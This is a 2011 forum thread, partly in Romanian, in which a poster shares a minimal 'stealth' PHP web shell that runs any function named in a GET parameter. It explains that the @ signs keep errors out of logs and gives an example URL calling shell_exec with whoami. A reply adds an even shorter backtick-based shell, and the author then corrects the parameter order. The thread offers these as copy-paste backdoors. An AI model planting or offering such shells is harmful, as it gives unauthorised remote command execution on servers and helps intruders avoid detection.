denjacker Posted September 24, 2011 Report Posted September 24, 2011 Have you ever needed a small shell written in PHP?Of course you have. But I bet it haven't been all too stealth!This is really pointless, but someone might be interested in it.So here you go folks!<?=($_=@$_GET[2]).@$_($_GET[1])?>it doesn't look like much so let me explain.PHP allows strings to be interpreted as function calls.That's a major part on how callbacks in PHP work.Example: <? $array = array(1,2,3); array_walk($array, 'f'); function f($x){echo $x * 2;} ?>What the following example does, is that array_walk() iterates through the array $array and applies the function f() on each and every element in the list.The function f() prints out the value from the array and multiplies it by two.The output results in: 246.The fun thing is, if you look on how the callback f() is applied - it's by a simple string. (Look at argument #2 in the first function; array_walk()).What does that mean?Well, to put it short, you're able to take a string - and execute it as a function name.Now, let's try something... fuzzier... <? $fuzz = 'phpinfo'; $fuzz(); ?>What might this do?Will it execute?Damn right.Now let's tear my tiny code apart.It's made out of two parts. $_=@$_GET[2] @$_($_GET[1])The first part takes the value from the GET-variable 2 and stores it in the temporary variable $_.The second part takes our temporary variable $_, and executes it with the GET-variable 1 as it's one-and-only argument.The @'s are only there for suppressing notices, warnings and/or fatals from showing up in logs, to the user or whatever else that might catch them.Conclusion: Copy and paste the snippet, and store it in a PHP-file.Execute a shell by going to: copypaste.php?1=shell_exec&2=whoamiThe response should be something like:apache...or as on Windows if you're running your server as a service:nt authority/system.Conclusion; PHP is fun! 4 Quote
crs12decoder Posted September 25, 2011 Report Posted September 25, 2011 Nu aveam idee . Tare.Nu pot sa-ti mai dau rep ca ti-am mai dat in trecut Quote
Andrei Posted September 25, 2011 Report Posted September 25, 2011 Din aceeasi grupa, cel mai scurt shell ca dimensiune : <?=@`$_GET[1]`?>. Quote
denjacker Posted September 25, 2011 Author Report Posted September 25, 2011 (edited) Exista o eroare in articolul de mai sus si un lucru nespecificat. Pentru a fi functional acest mic shell avem nevoie de :short_open_tag = on , din fisierul php.iniiar lacopypaste.php?1=shell_exec&2=whoamide fapt sunt inversate valorile parametrilor GET 1 si 2... (mi-a atras atentia devacanta)... adica :copypastephp?1=whoami&2=shell_execTestat pe Windows XP cu Vertrigo: Edited September 25, 2011 by denjacker Quote
